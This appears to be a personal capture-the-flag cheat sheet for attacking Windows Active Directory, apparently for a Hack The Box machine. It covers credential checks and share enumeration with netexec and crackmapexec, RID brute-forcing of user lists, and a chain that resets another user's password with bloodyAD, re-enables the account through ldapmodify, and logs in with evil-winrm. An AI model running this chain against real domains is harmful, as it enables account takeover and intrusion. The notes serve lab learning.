## This is for the windows targets:
Ports to pay attention:
445 SMB
389 LDAP
1433 MSSQL

normally you will get some creds for win machines.
You should try them to find what they are for

1) netexec ldap <targetIP> -u <username> -p <password>
and you will get smb and ldap confirmation

2) nxc smb <TargetIP> -u '<username>' -p '<password>' --shares
and you getw all the smb shares

3) crackmapexec smb <targetIP> -u <username> -p <password> --users or --computers

and now you get the info you wanted:

1) smbclient -L //targetip -U <username>
and then
2) smbclient //targetip -U <username>
>ls
and you get the files
3)

Then use bloodhund to find the connections and then use impacet tools.

---------------------------------------------------------------------------------------------------------
## An all around windows check guide

1. you do the normal scans (nmap for tcp and udp, rustscan)
2. 


---------------------------------------------------------------------------------------------------------
1. crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --users                          (the creds are given)
2. nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print
$2}' | awk '{print $1}' > users.txt                                                      (just creates a .txt with all users)

3. use bloodhound to see all the connections
4. if your user has "GenericWrite" at someone else you can change his password
5. crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --shares
6. smbclient \\\\xx.xx.xx.xx\\DEV -U "levi.james"
7. try dir and get filename

bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --dc-ip <ip> set password adam.silver 'abc@123'

save into modify.ldif

dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512

ldapmodify -x -H ldap://10.10.11.70 -D "ant.edwards@puppy.htb" -w 'Antman2025!' -f modify.ldif

evil-winrm -i 10.10.11.70 -u 'ADAM.SILVER' -p 'abc@123'

